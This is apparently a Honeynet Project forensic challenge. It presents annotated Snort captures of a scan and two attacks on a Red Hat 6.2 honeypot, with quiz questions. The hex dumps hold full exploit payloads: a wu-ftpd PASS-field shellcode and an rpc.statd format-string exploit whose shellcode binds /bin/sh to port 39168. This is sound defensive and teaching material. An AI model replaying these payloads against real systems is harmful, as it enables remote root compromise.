##### Exploit Challenge #####

Honeynet Project, http://project.honeynet.org

Below are two exploit attacks ran against our Honeynet,
specifically the system 172.16.1.104, a Linux RH 6.2
honeypot (default install). These attacks were captured
using snort, ver. 1.6.3 (www.snort.org). As you read
through these attacks, the challenge is to answer the
following questions:

QUESTION 1: Can you name the FTP scanning tool that uses a half open SYN?
QUESTION 2: What does the FTP exploit achieve? Does it open a port, create
a shell, add a user?
QUESTION 3: Where in the RPC exploit code does it bind a shell
to port 39168?
QUESTION 4: Are the two exploit attacks related?

##### Good Luck ######

### Bad guys starts off with a half open SYN scan of
### the network.
### QUESTION 1: Can you name this scanning tool?

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:27:31.019086 207.219.207.240:10101 -> 172.16.1.104:21
TCP TTL:241 TOS:0x0 ID:51721
**S***** Seq: 0x64 Ack: 0x0 Win: 0x200
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:27:31.025315 172.16.1.104:21 -> 207.219.207.240:10101
TCP TTL:63 TOS:0x0 ID:48209 DF
**S***A* Seq: 0x41C40069 Ack: 0x65 Win: 0x7FB8
TCP Options => MSS: 536
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:27:31.125575 207.219.207.240:10101 -> 172.16.1.104:21
TCP TTL:241 TOS:0x0 ID:65496
****R*** Seq: 0x65 Ack: 0x0 Win: 0x0

### Bad guys now completes a full TCP connect to the System.
### Notice how the IP and TCP Header information has changed now that
### the OS and not the tool are building the packets. TTL has gone
### from 241 to TTL of 50. Looks like this guys is 14 hops away.
### Notice how with the full connect, we have TCP Options and Window
### size that indicate Linux OS
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:36.825518 207.219.207.240:3464 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:13905 DF
**S***** Seq: 0xC331FCC5 Ack: 0x0 Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 125865634 0 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:36.829397 172.16.1.104:21 -> 207.219.207.240:3464
TCP TTL:63 TOS:0x0 ID:48210 DF
**S***A* Seq: 0xA03F7698 Ack: 0xC331FCC6 Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 105623688 125865634 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:36.931933 207.219.207.240:3464 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:13911 DF
******A* Seq: 0xC331FCC6 Ack: 0xA03F7699 Win: 0x7D78
TCP Options => NOP NOP TS: 125865645 105623688
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.159740 172.16.1.104:21 -> 207.219.207.240:3464
TCP TTL:63 TOS:0x10 ID:48215 DF
*****PA* Seq: 0xA03F7699 Ack: 0xC331FCC6 Win: 0x7D78
TCP Options => NOP NOP TS: 105624021 125865645
32 32 30 20 6B 79 6C 65 20 46 54 50 20 73 65 72 220 kyle FTP ser
76 65 72 20 28 56 65 72 73 69 6F 6E 20 77 75 2D ver (Version wu-
32 2E 36 2E 30 28 31 29 20 4D 6F 6E 20 46 65 62 2.6.0(1) Mon Feb
20 32 38 20 31 30 3A 33 30 3A 33 36 20 45 53 54 28 10:30:36 EST
20 32 30 30 30 29 20 72 65 61 64 79 2E 0D 0A 2000) ready...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.271630 207.219.207.240:3464 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:14254 DF
******A* Seq: 0xC331FCC6 Ack: 0xA03F76E8 Win: 0x7D78
TCP Options => NOP NOP TS: 125865980 105624021

### Bad guy got the header information, so he closes the connection.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.272824 207.219.207.240:3464 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:14256 DF
***F**A* Seq: 0xC331FCC6 Ack: 0xA03F76E8 Win: 0x7D78
TCP Options => NOP NOP TS: 125865980 105624021
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.274083 172.16.1.104:21 -> 207.219.207.240:3464
TCP TTL:63 TOS:0x10 ID:48216 DF
******A* Seq: 0xA03F76E8 Ack: 0xC331FCC7 Win: 0x7D78
TCP Options => NOP NOP TS: 105624032 125865980
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.274149 172.16.1.104:21 -> 207.219.207.240:3464
TCP TTL:63 TOS:0x10 ID:48217 DF
*****PA* Seq: 0xA03F76E8 Ack: 0xC331FCC7 Win: 0x7D78
TCP Options => NOP NOP TS: 105624033 125865980
32 32 31 20 59 6F 75 20 63 6F 75 6C 64 20 61 74 221 You could at
20 6C 65 61 73 74 20 73 61 79 20 67 6F 6F 64 62 least say goodb
79 65 2E 0D 0A ye...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.277315 172.16.1.104:21 -> 207.219.207.240:3464
TCP TTL:63 TOS:0x10 ID:48219 DF
***F**A* Seq: 0xA03F770D Ack: 0xC331FCC7 Win: 0x7D78
TCP Options => NOP NOP TS: 105624033 125865980
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.375292 207.219.207.240:3464 -> 172.16.1.104:21
TCP TTL:241 TOS:0x10 ID:14261
****R*** Seq: 0xC331FCC7 Ack: 0x0 Win: 0x0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.386029 207.219.207.240:3464 -> 172.16.1.104:21
TCP TTL:241 TOS:0x10 ID:14265
****R*** Seq: 0xC331FCC7 Ack: 0x0 Win: 0x0

### Looks like the bad guy is now done with FTP. He now moves
### onto RPC. First a UDP connection. Notice the Source port
### is less the 1024, bad guy is root on the remote system.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:23.939896 207.219.207.240:629 -> 172.16.1.104:111
UDP TTL:50 TOS:0x0 ID:53460
Len: 64
70 01 C4 19 00 00 00 00 00 00 00 02 00 01 86 A0 p...............
00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................
00 00 00 06 00 00 00 00 ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:23.942134 172.16.1.104:111 -> 207.219.207.240:629
UDP TTL:63 TOS:0x0 ID:48220
Len: 36
70 01 C4 19 00 00 00 01 00 00 00 00 00 00 00 00 p...............
00 00 00 00 00 00 00 00 00 00 03 A5 ............

### We now make a TCP connection to port 933. Most likely a probe
### for a vulnerable RPC service. However, a RST is returned,
### indicating no service is listening.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:24.046223 207.219.207.240:630 -> 172.16.1.104:933
TCP TTL:50 TOS:0x0 ID:53461 DF
**S***** Seq: 0x33CB6C6D Ack: 0x0 Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 126044347 0 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:24.047610 172.16.1.104:933 -> 207.219.207.240:630
TCP TTL:254 TOS:0x0 ID:48221
****R*A* Seq: 0x0 Ack: 0x33CB6C6E Win: 0x0

### Bad guys again makes a full TCP connection to FTP. This
### time he is up to something.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:27.617232 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53471 DF
**S***** Seq: 0x33BC72A2 Ack: 0x0 Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 126044705 0 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:27.618999 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x0 ID:48222 DF
**S***A* Seq: 0x110CE78A Ack: 0x33BC72A3 Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 105802758 126044705 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:27.713070 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53472 DF
******A* Seq: 0x33BC72A3 Ack: 0x110CE78B Win: 0x7D78
TCP Options => NOP NOP TS: 126044714 105802758
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:30.904850 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48227 DF
*****PA* Seq: 0x110CE78B Ack: 0x33BC72A3 Win: 0x7D78
TCP Options => NOP NOP TS: 105803086 126044714
32 32 30 20 6B 79 6C 65 20 46 54 50 20 73 65 72 220 kyle FTP ser
76 65 72 20 28 56 65 72 73 69 6F 6E 20 77 75 2D ver (Version wu-
32 2E 36 2E 30 28 31 29 20 4D 6F 6E 20 46 65 62 2.6.0(1) Mon Feb
20 32 38 20 31 30 3A 33 30 3A 33 36 20 45 53 54 28 10:30:36 EST
20 32 30 30 30 29 20 72 65 61 64 79 2E 0D 0A 2000) ready...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.017415 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53474 DF
******A* Seq: 0x33BC72A3 Ack: 0x110CE7DA Win: 0x7D78
TCP Options => NOP NOP TS: 126045045 105803086
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.018970 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53475 DF
*****PA* Seq: 0x33BC72A3 Ack: 0x110CE7DA Win: 0x7D78
TCP Options => NOP NOP TS: 126045045 105803086
55 53 45 52 20 66 74 70 0D 0A USER ftp..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.020239 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48228 DF
******A* Seq: 0x110CE7DA Ack: 0x33BC72AD Win: 0x7D78
TCP Options => NOP NOP TS: 105803098 126045045
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.025534 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48230 DF
*****PA* Seq: 0x110CE7DA Ack: 0x33BC72AD Win: 0x7D78
TCP Options => NOP NOP TS: 105803098 126045045
33 33 31 20 47 75 65 73 74 20 6C 6F 67 69 6E 20 331 Guest login
6F 6B 2C 20 73 65 6E 64 20 79 6F 75 72 20 63 6F ok, send your co
6D 70 6C 65 74 65 20 65 2D 6D 61 69 6C 20 61 64 mplete e-mail ad
64 72 65 73 73 20 61 73 20 70 61 73 73 77 6F 72 dress as passwor
64 2E 0D 0A d...
### Okay, looks like we have an attack against FTP here. But what?
### Snort detects the attack and sends the following alert.
### Dec 9 01:22:31 firewall snort[6511]: IDS287 - FTP - Wuftp260 venglin linux:
### 207.219.207.240:1882 -> 172.16.1.104:21
### This appears to be a format string and not a buffer overflow attack
### QUESTION 2: What does this FTP exploit achieve? Does it open a port,
### create a shell, add an account?
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.167035 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53476 DF
*****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78
TCP Options => NOP NOP TS: 126045057 105803098
50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90 PASS ...........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 31 C0 31 DB 31 C9 B0 46 CD .......1.1.1..F.
80 31 C0 31 DB 43 89 D9 41 B0 3F CD 80 EB 6B 5E .1.1.C..A.?...k^
31 C0 31 C9 8D 5E 01 88 46 04 66 B9 FF FF 01 B0 1.1..^..F.f.....
27 CD 80 31 C0 8D 5E 01 B0 3D CD 80 31 C0 31 DB '..1..^..=..1.1.
8D 5E 08 89 43 02 31 C9 FE C9 31 C0 8D 5E 08 B0 .^..C.1...1..^..
0C CD 80 FE C9 75 F3 31 C0 88 46 09 8D 5E 08 B0 .....u.1..F..^..
3D CD 80 FE 0E B0 30 FE C8 88 46 04 31 C0 88 46 =.....0...F.1..F
07 89 76 08 89 46 0C 89 F3 8D 4E 08 8D 56 0C B0 ..v..F....N..V..
0B CD 80 31 C0 31 DB B0 01 CD 80 E8 90 FF FF FF ...1.1..........
FF FF FF 30 62 69 6E 30 73 68 31 2E 2E 31 31 76 ...0bin0sh1..11v
65 6E 67 6C 69 6E 40 6B 6F 63 68 61 6D 2E 6B 61 englin@kocham.ka
73 69 65 2E 63 6F 6D 0D 0A sie.com..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48231 DF
*****PA* Seq: 0x110CE81E Ack: 0x33BC7446 Win: 0x7D78
TCP Options => NOP NOP TS: 105803113 126045057
35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72 530 Login incorr
65 63 74 2E 0D 0A ect...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.285312 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53477 DF
******A* Seq: 0x33BC7446 Ack: 0x110CE834 Win: 0x7D78
TCP Options => NOP NOP TS: 126045072 105803113
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:39.876754 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53479 DF
***F**A* Seq: 0x33BC7446 Ack: 0x110CE834 Win: 0x7D78
TCP Options => NOP NOP TS: 126045931 105803113
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:39.878137 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48232 DF
******A* Seq: 0x110CE834 Ack: 0x33BC7447 Win: 0x7D78
TCP Options => NOP NOP TS: 105803984 126045931
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:39.878150 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48233 DF
*****PA* Seq: 0x110CE834 Ack: 0x33BC7447 Win: 0x7D78
TCP Options => NOP NOP TS: 105803984 126045931
32 32 31 20 59 6F 75 20 63 6F 75 6C 64 20 61 74 221 You could at
20 6C 65 61 73 74 20 73 61 79 20 67 6F 6F 64 62 least say goodb
79 65 2E 0D 0A ye...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:39.880154 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48234 DF
***F**A* Seq: 0x110CE859 Ack: 0x33BC7447 Win: 0x7D78
TCP Options => NOP NOP TS: 105803984 126045931
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:39.979538 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:241 TOS:0x10 ID:53481
****R*** Seq: 0x33BC7447 Ack: 0x0 Win: 0x0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:39.983316 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:241 TOS:0x10 ID:53482
****R*** Seq: 0x33BC7447 Ack: 0x0 Win: 0x0
### The FTP attack is all done.

### Six hours later a new attack. Is it the same person coming
### from a different IP address, or is this unrelated? The bad
### guy starts off with a RPC probe.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:10.138117 207.19.5.25:709 -> 172.16.1.104:111
UDP TTL:49 TOS:0x0 ID:48624
Len: 64
2F 99 8C 57 00 00 00 00 00 00 00 02 00 01 86 A0 /..W............
00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................
00 00 00 11 00 00 00 00 ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:10.144426 172.16.1.104:111 -> 207.19.5.25:709
UDP TTL:63 TOS:0x0 ID:48239
Len: 36
2F 99 8C 57 00 00 00 01 00 00 00 00 00 00 00 00 /..W............
00 00 00 00 00 00 00 00 00 00 03 A3 ............

### He finds a vulnerability and immediately launches into a

### RPC exploit. This exploit appears to create a /bin/sh listening
### port 39168. He immediately connects to this port after the
### exploit. Snort detected the attack and sent the following alert.
### Dec 9 07:17:10 firewall snort[6511]: IDS362 - MISC - Shellcode X86 NOPS-UDP
:
### 207.19.5.25:710 -> 172.16.1.104:931
### QUESTION 3: Where in the exploit code below does he bind a shell
### to port 39168?
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:10.595325 207.19.5.25:710 -> 172.16.1.104:931
UDP TTL:49 TOS:0x0 ID:48712
Len: 1084
0C 72 54 F5 00 00 00 00 00 00 00 02 00 01 86 B8 .rT.............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ...............
3A 32 3F ED 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :2?.....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t...............
00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF ................
18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF ................
1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25 ............%8x%
38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8
78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31 x%8x%8x%236x%n%1
33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78 37x%n%10x%n%192x
25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90 %n..............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0 ..............1.
EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3 .|Y.A..A....A...
FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E .....f.....Y..A.
99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66 ..A...I..A.....f
CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0 .....f....0..A..
66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0 f......1..?.....
3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7 ?.....?..../bin.
46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56 F./shA0..F..v..V
10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F ..N.............
FF FF FF 00 ....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:12.552539 207.19.5.25:710 -> 172.16.1.104:931
UDP TTL:49 TOS:0x0 ID:48941
Len: 1084
0C 72 54 F5 00 00 00 00 00 00 00 02 00 01 86 B8 .rT.............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ...............
3A 32 3F ED 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :2?.....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t...............
00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF ................
18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF ................
1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25 ............%8x%
38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8
78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31 x%8x%8x%236x%n%1
33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78 37x%n%10x%n%192x
25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90 %n..............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
